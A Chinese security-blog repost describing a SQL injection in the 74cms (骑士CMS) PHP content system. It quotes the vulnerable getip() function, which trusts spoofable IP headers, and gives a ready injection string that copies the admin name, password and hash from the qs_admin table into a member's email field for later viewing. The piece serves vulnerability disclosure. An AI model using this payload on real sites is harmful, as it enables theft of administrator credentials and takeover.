74cms sql 骑士CMS 注入漏洞 - 脚本漏洞

admin 2021年4月3日19:38:27评论185 views字数 989阅读3分17秒阅读模式

    By:毅心毅意

    74cms sql 骑士CMS 注入漏洞 - 脚本漏洞

以下是引用片段:

function getip()
{
        if(getenv('HTTP_CLIENT_IP')){
                $onlineip=getenv('HTTP_CLIENT_IP');
        }else if(getenv('HTTP_X_FORWARDED_FOR')){
                $onlineip=getenv('HTTP_X_FORWARDED_FOR');
        }else if(getenv('REMOTE_ADDR')){
                $onlineip=getenv('REMOTE_ADDR');
        }else{
                $onlineip=$_SERVER['REMOTE_ADDR'];
        }
        return $onlineip;
}

    ip没过滤

    和子仪牛的这个漏洞很像http://www.t00ls.net/thread-14725-1-1.html。但是那个漏洞是用来提升权限。。。因为管理和会员在一个表。。。。。74cms的管理和会员不在一个表我们可以这样注入

$getinj="zyday1.1.', email=(SELECT concat(admin_name,0x2f,pwd,0x2f,pwd_hash ) FROM qs_admin) where username = '$dpusername'#";

    就是把查询到的账号密码赋值给email...接着在会员中心查看个人资料就可以爆账号和密码和hash了

    大体和子仪牛没什么区别了

    以前参考子仪牛的exp写了个exp。。。。但是弄丢了。。。不好意了

    有兴趣的同学可以写一下

文章来源于lcx.cc:74cms sql 骑士CMS 注入漏洞 - 脚本漏洞

相关推荐: 研究人员首次发现用于针对性攻击的Android木马

APT攻击已经不是什么新鲜事,但是以前一直是针对Windows和Mac OS X等平台的攻击,近日,卡巴斯基实验室的研究人员发现一次有针对性的APT攻击,其中利用了Android平台木马来进行钓鱼。 据卡巴斯基实验室的研究人员称,一位知名西藏活动人士的电子邮件…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:38:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   74cms sql 骑士CMS 注入漏洞 - 脚本漏洞http://cn-sec.com/archives/324102.html

发表评论

匿名网友 填写信息